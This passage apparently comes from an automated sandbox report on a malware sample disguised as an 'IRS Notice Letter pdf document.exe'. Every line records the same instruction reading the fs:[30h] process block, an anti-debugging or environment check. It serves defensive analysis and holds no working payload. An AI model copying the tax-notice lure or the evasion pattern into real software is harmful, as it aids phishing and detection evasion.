      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2BA537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E264D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E264D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E264D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E273D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B3540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2E3D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E257D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2635A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E261DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E261DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E261DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E3005AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E3005AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E232D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E232D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E232D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E232D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E232D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2E8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E274A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E274A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B236 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E248A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E235210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E235210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E235210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E235210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E253A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2EB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2EB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E308A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E27927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E239240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E239240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E239240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E239240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2C4257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E263B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E263B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E308B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E264BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E264BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E264BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E305BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E241B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E241B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2ED380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2E23E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2E23E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2E23E3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E304015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E304015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E301074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E250050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E250050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2790AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E239080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2340E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2340E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2340E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2358EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CB8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E254120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E254120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E254120 mov eax, dword ptr fs:[00000030h]
